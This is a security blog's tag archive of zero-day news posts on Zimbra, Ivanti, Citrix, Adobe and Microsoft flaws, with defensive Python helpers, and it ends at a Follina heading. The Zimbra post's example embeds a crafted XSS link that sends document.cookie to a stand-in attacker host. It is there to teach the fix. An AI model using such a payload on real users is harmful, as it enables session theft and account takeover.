Zero Day Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/zero-day/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Zimbra Vulnerability Exploited in the Wild
https://gridinsoft.com/blogs/zimbra-0-day-vulnerability/
Mon, 20 Nov 2023 13:03:39 +0000

The post Zimbra Vulnerability Exploited in the Wild appeared first on Gridinsoft Blog.

Google TAG’s recent discovery reveals a 0-day exploit, CVE-2023-37580, targeting Zimbra Collaboration. This is a Cross-Site Scripting (XSS) vulnerability exploited in four campaigns.

Zero-day discovery was patched

A severe vulnerability has been discovered in the Zimbra email software. Four threat groups exploited it to steal email data, user credentials and authentication tokens. According to Google TAG's research, most of the exploitation took place after Zimbra pushed the initial fix to its public GitHub repository but before the official patch and advisory were released.

The vulnerability, CVE-2023-37580, has a CVSS score of 6.1 and is a reflected cross-site scripting (XSS) flaw in Zimbra Collaboration versions before 8.8.15 Patch 41; Zimbra addressed it in the updates released on July 25, 2023. An attacker crafts a link to the vulnerable Zimbra endpoint with a malicious script in a URL parameter; when a logged-in user clicks it, the script runs in the victim's browser within the webmail session. Nothing has to be downloaded or installed: a single click on the link while logged in is enough.

Exploitation Overview

Google TAG first observed exploitation in June 2023. The attacks began on June 29, at least two weeks before Zimbra published its official advisory. Three of the four campaigns were discovered before the official patch was issued; the fourth was detected about a month after it.

Image: Zimbra vulnerability exploitation (Image by Google TAG)

Greece Targeted for Email Theft. The first exploitation targeted a government organization in Greece. The attacker sent emails containing the exploit URL; when a user clicked it during an active Zimbra session, the link delivered a framework that Volexity had documented in February 2022. The framework used the XSS to steal mail data, including emails and attachments, and to set up auto-forwarding to an attacker-controlled email address.

Winter Vivern Exploits after the Hotfix. Zimbra pushed a hotfix to GitHub on July 5. Starting July 11, and for about two weeks, a second actor exploited the vulnerability with multiple exploit URLs sent to government organizations in Moldova and Tunisia. Google TAG attributed this activity to the APT group Winter Vivern (UNC4907); the exploit was used to load further malicious scripts.

Phishing Campaign in Vietnam. Days before Zimbra's official patch, an unidentified group exploited the vulnerability in a credential-phishing campaign against a Vietnamese government organization. The exploit URL pointed to a script that displayed a phishing page for webmail credentials.

Authentication Token Theft in Pakistan. After the CVE-2023-37580 patch release, a fourth campaign targeted a government organization in Pakistan, focusing on stealing Zimbra authentication tokens, exfiltrated to ntcpk[.]org.
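
The mechanism behind all four campaigns, as an added example in Python that is not Zimbra's code and does not reproduce the real CVE-2023-37580 endpoint: the host names, the search endpoint and the "q" parameter are made up for the example. It shows a reflected XSS where a URL parameter is copied into the page unescaped, the kind of crafted link a phishing email carries, the escaped rendering that closes the hole, and a parser-based check that tells the two apart the way a browser's tokenizer would.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed crafted link of the kind carried in the phishing e-mails: the
# "q" parameter holds a script that ships the session cookie to the attacker.
# Host names and the parameter name are made up for this example.
CRAFTED_LINK = (
    "https://webmail.example.test/search?q="
    "%27%3E%3Cscript%3Efetch(%27https://attacker.example/c?%27"
    "%2Bdocument.cookie)%3C/script%3E"
)


def param_from_link(link: str, name: str = "q") -> str:
    """Return one query parameter as the server sees it (URL-decoded)."""
    return parse_qs(urlsplit(link).query).get(name, [""])[0]


def render_unsafe(value: str) -> str:
    """Vulnerable pattern: user input is reflected straight into an attribute."""
    return f"<input name='q' value='{value}'>"


def render_safe(value: str) -> str:
    """Hardened pattern: escape for the attribute context, quotes included."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Collects start tags in the order a browser's tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def rendered_tags(markup: str) -> list[str]:
    """Element names present in the rendered page; an injected <script> shows up here."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def is_injected(markup: str, tag: str = "script") -> bool:
    """True if the rendered page contains an element the template never wrote."""
    return tag in rendered_tags(markup)


if __name__ == "__main__":
    payload = param_from_link(CRAFTED_LINK)
    for label, renderer in (("unsafe", render_unsafe), ("safe", render_safe)):
        page = renderer(payload)
        print(f"{label:6s} tags={rendered_tags(page)} injected={is_injected(page)}")
```

Marking the session cookie HttpOnly stops document.cookie from reading it, but it is not a fix: a script that already runs inside the victim's session can call the webmail API directly, which is how the first campaign read mail and added a forwarding rule. The fix is the context-aware output encoding in render_safe, with a Content Security Policy that forbids inline scripts as defense in depth.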

Safety Recommendations

As this case shows, attackers closely watch public source repositories, because a commit that fixes a vulnerability often reveals it before the fix reaches users. The window between the public commit and the released patch is exactly when exploitation picks up.

CVE-2023-37580 can be used to steal user data or take over user accounts. Upgrade to Zimbra Collaboration (ZCS) 8.8.15 Patch 41 or later to close it; the installed release can be checked with zmcontrol -v as the zimbra user. If you cannot upgrade immediately, reduce the risk by disabling the Zimbra Classic Web Client and using the Zimbra Web App instead.

Ivanti EPMM Vulnerability Patch is Vulnerable
https://gridinsoft.com/blogs/ivanti-epmm-patch-fix-vulnerable/
Thu, 03 Aug 2023 14:08:52 +0000

Ivanti, a provider of a wide range of enterprise management solutions, has apparently taken up the baton from Progress Software (formerly Ipswitch), the vendor of the infamous MOVEit MFT. Analysts discovered two severe vulnerabilities in its EPMM product over the last 10 days, and the company released urgent fixes. However, the patch for CVE-2023-35078 turns out to be bypassable through the same pattern.

Ivanti EPMM Vulnerabilities Keep Going

On July 25, 2023, Ivanti released a note regarding a vulnerability in its EPMM device management software. It urged customers to install a patch for the flaw (tracked as CVE-2023-35078), which allowed attackers to bypass authentication and reach all of the application's API functionality. Unsurprisingly, it received a top 10/10 CVSS rating. The bad news is that the vulnerability had reportedly been exploited since April 2023. The patch offered by the company closes the unauthenticated access.

Image: Heatmap of CVE-2023-35078 exploitation by countries

Soon after, another security loophole was discovered. CVE-2023-35081 is a path traversal vulnerability that lets an authenticated administrator write arbitrary files to the appliance. Chained with CVE-2023-35078, which hands an attacker that administrative access without credentials, it lets attackers pursue different goals within one attack, and its exploitation appears to be on roughly the same scale as the first flaw.

The problem is that the patched CVE-2023-35078 is not the end of the story. Researchers found a way to pull off much the same trick against the patched version that attackers used earlier. The new flaw, tracked as CVE-2023-35082, affects older EPMM versions, 11.2 and below. Even after the patch, the application did not provide a sustainable level of security. Fortunately, no exploitation of this vulnerability has been observed yet. But as we know, once a 0-day becomes an n-day, its usage becomes much more widespread.

How to protect against CVE-2023-35082?

The only effective advice is to update Ivanti EPMM to a version newer than 11.2. Rolling out such an update across a huge fleet of devices may be troublesome, but that effort is far preferable to the effort of cleaning up after a cyberattack. There are also several other measures that are not preventive but still effective.

Adopt cybersecurity solutions with a zero-trust policy. Since the most damaging modern cyberattacks come through vulnerabilities in trusted software, the only answer is to trust nothing by default. EDR/XDR solutions built around this concept have their downsides, but their protective value is undoubted: whether a process belongs to a home-made utility or to a program with over a million users, every action it takes is checked.

Use UBA and SIEM to improve visibility and response in the environment. The zero-trust systems mentioned above benefit greatly from additional sources of information. This is almost essential in large networks consisting of different types of devices. Being aware, and being able to respond as quickly as possible, is vital in modern cybersecurity, where the count can come down to minutes.

Ivanti 0-day exploited to target Norwegian government
https://gridinsoft.com/blogs/ivanti-zero-day-norwegian-government/
Tue, 25 Jul 2023 18:10:21 +0000

Software company Ivanti has patched a zero-day authentication bypass in Ivanti Endpoint Manager Mobile (EPMM, formerly MobileIron Core). The vulnerability has the maximum CVSS score and was actively exploited to gain unauthorized access.

What is Ivanti Company?

Ivanti is an IT software company headquartered in Utah, United States. It produces a variety of IT management and security solutions used by businesses, government agencies and educational institutions. For example, nearly all Norwegian ministries use Ivanti Endpoint Manager Mobile. Having such important clients is always a huge responsibility, and unfortunately not everyone is capable of mitigating all the risks.

Ivanti EPMM 0-day Vulnerability

The Australian Cyber Security Centre (ACSC) has received reports of a vulnerability in Ivanti EPMM (Endpoint Manager Mobile), also known as MobileIron Core, affecting all versions prior to the fixed releases. In brief, the vulnerability is CVE-2023-35078 and allows remote access to the API without authentication. It has the maximum severity rating on the CVSS scale, 10 out of 10. While Ivanti said it received the information from a reliable source, the company did not disclose further details about the nature of the attacks or the identity of the attackers. Nevertheless, the Norwegian National Security Authority (NSM) confirmed that unknown attackers exploited the vulnerability to attack the Norwegian Government Security and Service Organisation (DSS). Thus, attackers could likely access and steal sensitive data from the compromised platform.

On Sunday, the company released a security patch; users can install it by upgrading to EPMM 11.8.1.1, 11.9.1.1 or 11.10.0.2. Versions below 11.8 are outdated and unsupported, but Ivanti also provided an update for them.

CVE-2023-35078 Details

CVE-2023-35078 is a zero-day authentication bypass vulnerability. It provides unauthenticated remote access to specific API paths. An attacker can read personally identifiable information such as usernames, phone numbers and other mobile device details on the vulnerable system. An attacker can also make configuration changes, including creating an EPMM administrator account and using it to make further changes. The vulnerability affects all supported versions of EPMM (11.10, 11.9 and 11.8) and earlier unsupported releases. It is patched in versions 11.10.0.2, 11.9.1.1 and 11.8.1.1. Since CVE-2023-35078 has the maximum CVSS severity of 10.0 and is easy to exploit, experts strongly recommend updating all devices, including EOL ones. If you cannot update an appliance, take it offline.
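
A triage helper for both Ivanti posts on this page, as an added example in Python that is not Ivanti's tooling: given the build reported by each EPMM appliance, it says whether CVE-2023-35078 is patched (fixed in 11.8.1.1, 11.9.1.1 and 11.10.0.2, as above) and whether the build falls in the range the follow-up post gives for CVE-2023-35082 (11.2 and below, as reported at the time; the vendor later widened that range). The inventory of host names and builds is constructed for the example.

```python
from typing import Dict, List, Tuple

Version = Tuple[int, ...]

# Fixed builds per supported branch, from Ivanti's CVE-2023-35078 advisory.
FIXED_35078: Dict[Tuple[int, int], Version] = {
    (11, 8): (11, 8, 1, 1),
    (11, 9): (11, 9, 1, 1),
    (11, 10): (11, 10, 0, 2),
}
OLDEST_SUPPORTED = (11, 8)
# CVE-2023-35082 as first reported: 11.2 and earlier (later widened by Ivanti).
LAST_BRANCH_35082 = (11, 2)


def parse_version(text: str) -> Version:
    """'11.9.1.1' -> (11, 9, 1, 1); rejects anything that is not dotted integers."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) < 2:
        raise ValueError(f"unexpected EPMM version string: {text!r}")
    return parts


def _pad(v: Version, width: int = 4) -> Version:
    """Right-pad with zeros so (11, 9) and (11, 9, 0, 0) compare equal."""
    return v + (0,) * (width - len(v))


def status_35078(text: str) -> str:
    """'patched', 'vulnerable', 'unsupported-vulnerable' or 'unknown-branch'."""
    v = parse_version(text)
    fixed = FIXED_35078.get(v[:2])
    if fixed is None:
        # Branches older than 11.8 are EOL and were vulnerable; branches newer
        # than the advisory lists need a manual check against the vendor notes.
        return "unsupported-vulnerable" if v[:2] < OLDEST_SUPPORTED else "unknown-branch"
    return "patched" if _pad(v) >= _pad(fixed) else "vulnerable"


def in_35082_range(text: str) -> bool:
    """True if the build is in the 11.2-and-below range the follow-up post describes."""
    return parse_version(text)[:2] <= LAST_BRANCH_35082


def triage(inventory: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Per-host verdicts for both CVEs."""
    report: Dict[str, Dict[str, str]] = {}
    for host, build in inventory.items():
        report[host] = {
            "build": build,
            "CVE-2023-35078": status_35078(build),
            "CVE-2023-35082": "in-affected-range" if in_35082_range(build) else "outside-range",
        }
    return report


def needs_action(report: Dict[str, Dict[str, str]]) -> List[str]:
    """Hosts not cleanly patched for CVE-2023-35078 or sitting in the 35082 range."""
    return sorted(
        host for host, verdict in report.items()
        if verdict["CVE-2023-35078"] != "patched"
        or verdict["CVE-2023-35082"] == "in-affected-range"
    )


# Constructed sample inventory: hostname -> build reported by the appliance.
INVENTORY = {
    "mdm-01.example.test": "11.10.0.2",
    "mdm-02.example.test": "11.9.1.0",
    "mdm-03.example.test": "11.8.1.1",
    "mdm-legacy.example.test": "11.2.0.0",
}

if __name__ == "__main__":
    report = triage(INVENTORY)
    for host in needs_action(report):
        print(host, report[host])
```

A host that reports "unknown-branch" is not a pass: it means the advisory table above has nothing to say about that branch, so check the vendor's current notes rather than assuming it is fixed.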

Image: CVE-2023-35078 vulnerability heatmap by countries

In addition, Ivanti has published its security advisory behind a login: only customers with credentials can access it, which is perplexing. The company also clarified that the vulnerability has not been used in a supply chain attack. The Internet device search engine Shodan shows more than 2,900 MobileIron user portals publicly exposed on the Internet, mainly in the US and Europe; about 30 of them belong to local and state governments in the United States. Most of the exposed servers are in the US, Germany, the UK and Hong Kong. The Norwegian National Cyber Security Centre has notified all known system owners in the country with MobileIron Core reachable from the Internet that a security update has been issued.

How to secure against Ivanti 0-day vulnerability?

The Norwegian government is not Ivanti's only client. Companies from all over the world use its software, and the weak spot turned up where no one expected it. Here are some steps you can take to protect against the Ivanti 0-day vulnerability.

  • Apply the latest security patches. This is the first action to take, since Ivanti has released a patch that addresses the vulnerability. Apply it as soon as possible to protect your organization.
  • Use multi-factor authentication (MFA). MFA adds a layer of security to your IT systems by requiring two or more pieces of evidence to authenticate, which makes it harder for attackers to use stolen credentials. Note that MFA does not stop CVE-2023-35078 itself, which bypasses authentication entirely; it limits what an attacker can do with the credentials harvested afterwards.
  • Monitor your IT systems for suspicious activity, such as unauthorized access attempts, newly created administrator accounts or unusual traffic patterns. This helps you identify and respond to attacks quickly.
  • Educate your users about security best practices. Users are the first line of defense against cyberattacks. Teach them, for example, to avoid clicking suspicious links or opening attachments from unknown senders.

By following these steps, you can help to protect your organization against the 0-day vulnerability and other cyberattacks.

Citrix and Adobe Vulnerabilities Under Active Exploitation
https://gridinsoft.com/blogs/citrix-adobe-vulnerabilities/
Thu, 20 Jul 2023 16:36:50 +0000

Citrix has patched a zero-day vulnerability, while Adobe warns of attacks using a ColdFusion zero-day and has released an urgent update that turned out to be incomplete. The story is not over, as these vulnerabilities are still being exploited.

Citrix and Adobe Patch 0-day Vulnerabilities

At the same time, products of two well-known companies were hit with critical vulnerabilities that allow remote execution of malicious code. The vulnerability in Citrix NetScaler ADC and NetScaler Gateway, CVE-2023-3519, has a CVSS score of 9.8 out of 10 and allows code execution without authentication. On July 18, Citrix said it had patched the vulnerability, but attackers had likely already had time to exploit it.

Adobe is doing a little worse. Adobe ColdFusion, a popular web application platform, faces critical vulnerabilities: CVE-2023-38203, with a severity of 9.8 out of 10, and CVE-2023-29298. Chained together, they allow an unauthenticated attacker to execute arbitrary code on a vulnerable server. The company released a patch that was supposed to fix the vulnerabilities. However, the patch Adobe provided for CVE-2023-29298 on July 11 is incomplete, which means that no working remedy for CVE-2023-29298 currently exists.

Moreover, researchers at Project Discovery published a technical write-up of what they believed was CVE-2023-29300, a flaw Adobe had already patched. In fact, the write-up described a different, unpatched vulnerability, later tracked as CVE-2023-38203, so the security company unintentionally disclosed a critical zero-day to users already dealing with the incomplete patch. Project Discovery quickly took the post down, and Adobe fixed the vulnerability two days later. CVE-2023-29300 also has a severity rating of 9.8.

Consequences

While it is impossible to estimate the potential damage from these vulnerabilities, they can be compared to the MOVEit and GoAnywhere vulnerabilities: the former resulted in 357 organizations being compromised, while the latter affected over 100. Citrix and Adobe have both released patches, but since the ColdFusion fix for CVE-2023-29298 is incomplete, users can only hope the problem will be fully fixed soon.

Image: Top 10 countries that use Adobe ColdFusion

How to protect against vulnerabilities?

Protecting against vulnerabilities involves adopting proactive cybersecurity measures and practices. Here are some steps you can take to enhance your security:

  • Keep Software Updated. Regularly update your operating system, applications and antivirus software. Developers release updates to patch security vulnerabilities, so staying up to date is crucial; for the flaws above, that means applying the Citrix and Adobe patches and watching for follow-up fixes to the incomplete one.
  • Use Strong Passwords. Strong passwords help prevent compromise through brute force. Consider a password manager to store and manage them securely.
  • Enable Multi-Factor Authentication. MFA provides an additional layer of security by requiring extra verification (like a code sent to your phone), which adds a significant barrier for intruders.
  • Use protection solutions. Capable antivirus software complements the recommendations above; if an infection is attempted, it can neutralize the threat before it causes harm.
  • Keep Abreast of Security News. Finally, stay informed about the latest cybersecurity threats and best practices so you can adapt your defenses accordingly.

Although there is no such thing as 100% protection, implementing these measures can significantly reduce your risk and make it harder for attackers to exploit vulnerabilities.

Microsoft CVE-2023-36884 Vulnerability Exploited in the Wild
https://gridinsoft.com/blogs/microsoft-cve-2023-36884-vulnerability/
Mon, 17 Jul 2023 17:11:08 +0000

On July 11, 2023, Microsoft published an advisory on CVE-2023-36884, a remote code execution vulnerability in Office and Windows HTML. Microsoft acknowledged a targeted attack that exploits the flaw using specially crafted Microsoft Office documents. An attacker can gain control of a victim's computer with a malicious Office document, but the victim must open it.

Microsoft discovered a phishing campaign conducted by a threat actor tracked as Storm-0978. The targets were government and defense entities in Europe and North America. The actor used lures related to the Ukrainian World Congress and exploited CVE-2023-36884.

Who is Storm-0978?

The cybercriminal group known as Storm-0978, based in Russia, is known for a range of illegal activities: ransomware and extortion operations, targeted credential-gathering campaigns, development and distribution of the RomCom backdoor, and deployment of the Underground ransomware.

Image: Overall RomCom architecture

Underground ransomware is closely related to Industrial Spy ransomware, first seen in the wild in May 2022. Besides the CVE-2023-36884 campaign identified in June 2023, Storm-0978 infects users through phishing sites masquerading as legitimate software downloads, impersonating Adobe products, SolarWinds Network Performance Monitor, SolarWinds Orion, Advanced IP Scanner, KeePass and Signal. Users who download and run the files from these sites end up with the RomCom backdoor.

CVE-2023-36884 Exploitation

In June 2023, Storm-0978 ran a phishing campaign that used a fake OneDrive loader to deliver a RomCom-like backdoor. The emails targeted defense and government entities in Europe and North America with lures related to the Ukrainian World Congress and led to exploitation of CVE-2023-36884.

Image: Storm-0978 email using NATO and Ukrainian World Congress themes

BlackBerry documented attacks against attendees of the upcoming NATO Summit on July 8, but the use of a zero-day in those attacks was unknown at the time; Microsoft later confirmed that Storm-0978 exploited CVE-2023-36884 in this phishing activity.

The attackers used the RomCom variant for espionage and deployed Underground ransomware for ransomware operations. The campaign shows that Storm-0978 is a capable group that is likely to target further organizations.

How do you avoid vulnerability?

Until a patch is released, organizations should adopt all available mitigations. The vulnerability has been used in targeted attacks, and news of its existence will doubtlessly lead other attackers to try to replicate the exploit.

Microsoft's suggested mitigation is a registry change. In Regedit, navigate to the following path and open (or create) the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION key:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\

There, create a REG_DWORD value named after each affected application executable and set its data to 1:

  • Excel.exe
  • Graph.exe
  • MSAccess.exe
  • MSPub.exe
  • Powerpnt.exe
  • Visio.exe
  • WinProj.exe
  • WinWord.exe
  • Wordpad.exe
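
A way to roll the mitigation out and then verify it across a fleet, as an added example in Python that is not Microsoft's tooling. build_reg() writes the key, value names and data listed above as a .reg file for reg import, and unprotected() reads a reg export of the same key back and lists the executables that still lack the value or have it set to something other than 1. The exported text below is constructed for the example; the key and value names are the ones from the guidance.

```python
import re
from typing import Dict, List

# Key and value names from Microsoft's CVE-2023-36884 mitigation guidance.
MITIGATION_KEY = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer"
    r"\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION"
)
OFFICE_APPS = [
    "Excel.exe", "Graph.exe", "MSAccess.exe", "MSPub.exe", "Powerpnt.exe",
    "Visio.exe", "WinProj.exe", "WinWord.exe", "Wordpad.exe",
]

_VALUE_LINE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')


def build_reg(apps: List[str] = OFFICE_APPS) -> str:
    """Text of a .reg file that creates the key and sets each app's DWORD to 1."""
    lines = ["Windows Registry Editor Version 5.00", "", f"[{MITIGATION_KEY}]"]
    lines += [f'"{app}"=dword:00000001' for app in apps]
    return "\r\n".join(lines) + "\r\n"


def values_in_export(reg_text: str, key: str = MITIGATION_KEY) -> Dict[str, int]:
    """Parse `reg export` output into {value name (lower-cased): data} for the
    given key only; values under other keys are ignored. Registry value names
    are case-insensitive, hence the lower-casing."""
    values: Dict[str, int] = {}
    in_key = False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
            continue
        match = _VALUE_LINE.match(line) if in_key else None
        if match:
            values[match.group(1).lower()] = int(match.group(2), 16)
    return values


def unprotected(reg_text: str, apps: List[str] = OFFICE_APPS) -> List[str]:
    """Apps whose value is missing from the exported key or is not 1."""
    present = values_in_export(reg_text)
    return [app for app in apps if present.get(app.lower()) != 1]


# Constructed export of a half-applied mitigation: two apps protected, one
# explicitly zero, and a value under an unrelated key that must not count.
SAMPLE_EXPORT = "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    f"[{MITIGATION_KEY}]",
    '"WinWord.exe"=dword:00000001',
    '"Excel.exe"=dword:00000000',
    '"powerpnt.exe"=dword:00000001',
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SOMETHING_ELSE]",
    '"Visio.exe"=dword:00000001',
    "",
])

if __name__ == "__main__":
    print(build_reg(), end="")
    print("still unprotected:", unprotected(SAMPLE_EXPORT))
```

reg export writes UTF-16 LE with a byte-order mark, so read the exported file with open(path, encoding="utf-16") before passing it to unprotected(); both reg export of an HKLM key and reg import of the generated file need an elevated prompt. The Computer\ prefix shown in the Regedit path above is only Regedit's display prefix and does not belong in a .reg file.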

Still, a mitigation like this is not a patch. Attackers know about the suggested fix and may find a way to revert it or to bypass the registry block, and Microsoft itself notes that the setting can affect regular functionality for some use cases. For that reason, I also recommend having proactive and reactive security measures in place.

  • Activate cloud-delivered protection in your antivirus software to defend against constantly changing attacker methods. Cloud-based machine learning can detect and block most new and unknown threats.
  • Back up your data and store the backups offline or on a separate network. Backups are the kryptonite of ransomware: the attack achieves nothing if you can simply restore everything.
  • Wherever possible and practical, enable automatic software updates on all connected devices, including computers and mobile phones.
  • Always verify the authenticity of links and email attachments before opening them, especially when they come from an untrusted source.
  • Use CDR solutions. CDR, or Content Disarm and Reconstruction, is a document-security technique that strips active content (macros, embedded objects, scripts) from files and rebuilds them, so an exploit document cannot trigger.

Patch CVE-2023-36884

At the time of writing, Microsoft has not released a patch for CVE-2023-36884; this section will be updated as more information becomes available. Even after a patch is available, it pays to stay cautious, watch what you open and click on the Internet, and follow the Zero Trust rule.

How to Protect Your Digital Footprint
https://gridinsoft.com/blogs/how-to-protect-your-digital-footprint/
Tue, 20 Jun 2023 22:29:40 +0000

The modern business world has been greatly advanced by the internet. Its convenience and numerous benefits have made people from all over the world reliant on the digital world. As the use of digital platforms continues to increase, businesses of all sizes should consider their digital footprint.

What is Corporate Digital Footprint?

Your company’s digital footprint encompasses all its online activities, transactions, communications, marketing, and networking. This also includes those of your business partners, such as vendors and suppliers. The cloud has complicated digital footprints in recent years as it’s used for mission-critical operations, expanding their digital footprints and making them harder to define or secure. However, managing and securing your digital footprint is achievable as long as you know how to begin.

Company’s vs. Person’s Digital Footprint

A company's digital footprint and a person's differ in identity, attack targets, data volume and consequences. Cyberattacks on personal digital footprints aim to compromise personal information and financial data, whereas attacks on a company's digital footprint target its information systems and sensitive data. Attacks on companies are more complex and have more severe consequences: loss of customer trust, financial loss and legal problems. Understanding these differences is crucial for developing appropriate security measures to protect personal information and digital infrastructure.

Image: Briefly about the personal digital footprint

Types of Digital Footprint Risk

To simplify the complex digital risk landscape, it can be divided into categories. This helps organizations pinpoint the most vulnerable areas of their systems and provide targeted risk protection. The main categories of digital risk are:

  • Data Privacy. Sensitive data risks refer to any potential threats that could compromise the protection of confidential information, including personally identifiable information, financial data, and more.
  • Cybersecurity. Risks associated with unauthorized access to sensitive resources and potential data breaches. These risks may be inherent or residual.
  • Data Leaks. Accidental exposure of private data, known as data leaks, can potentially lead to data breaches. With the expansion of the digital landscape, there are more instances of data in use, data in transit, and data at rest. Maintaining data security is challenging under these dynamic conditions, making data leakage an unfortunate consequence of digital transformation.
  • Compliance. Non-compliance risks pertain to violating regulatory compliance standards, which can lead to malpractices. Failure to comply by vendors can also impede digital risk protection efforts. Several regulatory requirements mandate complete compliance.
  • Third-Party Risk. Understanding the potential risks of working with third-party vendors is essential. These risks may include vulnerabilities within the vendor’s ecosystem, breaches of security measures, failure to comply with regulations, and even theft of intellectual property.
  • Cloud Technology. Risks that affect systems, processes and people, arising from technological incompatibilities, errors and failures.
  • Process Automation. Compatibility issues can occur when automation processes are changed or new functions are added; these also feed into technology risk.
  • Resilience. It means maintaining critical services and operations during disruptions or risks. Risks can include server outages or data breaches. Lack of backup and recovery systems, redundant infrastructure, and disaster recovery plans to minimize downtime and restore services can paralyze an organization indefinitely.

How To Protect Your Organization’s Digital Footprint

To prevent cyber attacks, businesses must first identify the threats. This lets them determine what needs to be protected, how to protect it and which risks to watch for. In a nutshell, the questions that should be on the agenda are: “What methods are hackers currently using to attack?”, “What is encrypted, and how?”, “Can our staff spot a phishing email?”, “Is our software up to date?”, “What are our vulnerabilities?”, “Is our data stored securely?” and so on. By staying informed, businesses can better protect themselves against cyber threats. Below, we look in more detail at five methods to reduce the risks.

Image: How to protect your organization’s digital footprint

Attack Surface Exploration

Everything is online these days. Virtually every firm has a website showcasing its products or services, and users can find hundreds of websites for everything from corporate services to manufacturing, commerce, education and entertainment. Digital access is undoubtedly convenient, but IT professionals know it increases the risk of cyberattacks. Rapid expansion into new environments leads to technology sprawl, and the resulting misconfigurations and lack of visibility increase security risks and vulnerabilities. Attackers take advantage of this: during the pandemic, many technologies were deployed hastily, and many exploits targeted load balancers, cloud environments and VPNs. You can increase visibility by applying some tactics, among them:

  • Monitoring the latest threat intelligence and trends to understand evolving risks
  • Maintaining an up-to-date asset inventory of systems, networks, applications, and devices to identify potential entry points
  • Conducting regular vulnerability assessments and penetration testing exercises to find weaknesses and potential attack vectors
  • Educating employees and stakeholders about cybersecurity best practices to reduce human error
  • Performing thorough vendor risk assessments and monitoring the security posture of third parties as part of a holistic third-party risk management program

Using these tactics, you can strengthen your security posture and protect your valuable data.

Fast Discovery and Reaction to Vulnerabilities

Vulnerability assessment provides a snapshot of security vulnerabilities. Vulnerability management, however, is a continuous process that offers real-time remediation guidance. The former involves using scanners to identify known vulnerabilities, while the latter employs multiple data sources to continually assess the situation. Vulnerability assessments identify outdated applications or operating systems and device configuration issues such as insecure ports and weak passwords. They are best suited to detect common vulnerabilities and exposures, or CVEs, listed in publicly available databases.

You can treat the following six steps as a continuous cycle rather than a linear process:

  • Build an asset directory and inventory all assets.
  • Classify the assets by risk level and prioritize them.
  • Rank them by their exposure to vulnerabilities.
  • Build a security strategy around that ranking.
  • Remediate the prioritized vulnerabilities.
  • Evaluate the security strategy’s effectiveness, then start the cycle again.

In addition, you can use continuous vulnerability scanning tools. These solutions can automatically monitor your networks, systems, and applications, quickly detecting weaknesses such as:

  • Open ports
  • Misconfigurations
  • Outdated software

Combining this strategy with other tactics mentioned earlier will enable you to proactively identify hidden vulnerabilities, prioritize them accordingly, and allocate resources effectively to minimize risks.

Performing Cybersecurity Analysis to Find Weaknesses

When you identify security risks and vulnerabilities, it is crucial to determine their root cause. By doing so, you can gain insight into the underlying factors that led to the issue and implement adequate preventive measures to avoid similar problems. It also helps to prioritize remediation efforts, allocate resources effectively, establish accountability, and improve incident response procedures. You can achieve this by conducting thorough incident investigations, analyzing system logs, and performing forensic analysis.

In addition, Business Impact Analysis (BIA) is crucial to business continuity planning. It involves identifying critical business functions and assessing their dependencies, determining Recovery Time Objectives, assessing impact, conducting a risk assessment, and developing mitigation strategies. The goal is to understand vulnerabilities, dependencies, and potential consequences of disruptions, enhancing resilience and ensuring the continuity of critical operations during adverse events. This will not only help with finding weak spots, but also provide motivation to improve your business’s cybersecurity.

Spot Third-Party Risks

According to analyses, supply chain attacks are now the most commonly used method by threat actors to access networks. Research indicates that 62 percent of network intrusions stem from a third party, typically someone in your digital supply chain. Moreover, if a third-party system is breached or compromised, this can have serious consequences, including data breaches, service outages, and reputational harm. To prevent cyber threats, it’s essential to proactively identify third-party cyber risks, assess vendor security practices and controls, and take appropriate measures to reduce risks. Best practices in this area include:

  • Conducting thorough security assessments.
  • Implementing contractual agreements that enforce security requirements.
  • Regularly monitoring third-party security practices.
  • Establishing incident response protocols in collaboration with your vendors.

Response to Zero-Day Vulnerabilities

Zero-day exploits cannot be identified by traditional signature-based anti-malware systems. However, there are a few ways to identify suspicious behavior that indicates a zero-day exploit. Anti-malware vendors provide statistics on detected exploits, which can be fed into machine-learning systems to identify current attacks. Signature-based detection uses digital signatures to identify variants of prior attacks. Behavior-based detection alerts on suspicious scanning and traffic on the network. A hybrid approach combines all three methods for more efficient zero-day malware discovery.

In addition, you can use EDR solutions against zero-day vulnerabilities. EDR/XDR solutions detect and respond to advanced threats, including zero-day vulnerabilities, using techniques like behavioral analysis, threat intelligence, anomaly detection, sandboxing, and rapid response. They help identify abnormal behavior patterns, attack indicators, and potential exploits while minimizing impact and awaiting a patch or remediation.

The various types of tasks can be automated to speed up your investigative and hunting process.

Managing and protecting your business’s digital footprint must be a priority in this dynamic digital world because your company’s overall growth and survival depend on it. The tips above will help protect your company’s valuable digital footprint from the increasingly sophisticated risks of the digital realm. Businesses must have a holistic view of their digital footprint and threat landscape. They must always consider what information is available, where it is, who can see it, how it is protected, etc. Threat awareness is an essential part of a strategy to eliminate malicious cyberattacks.

Attackers Exploit MSDT Follina Bug to Drop RAT https://gridinsoft.com/blogs/threat-actors-exploit-msdt-follina-bug-to-drop-rat-and-infostealer/ Thu, 09 Jun 2022 10:09:21 +0000
Security specialists caution users about the exploitation of the recently disclosed Follina Bug found in all supported versions of Windows. Threat actors have actively utilized this vulnerability to install payloads such as the AsyncRAT trojan and infostealer.

Understanding the Follina Vulnerability

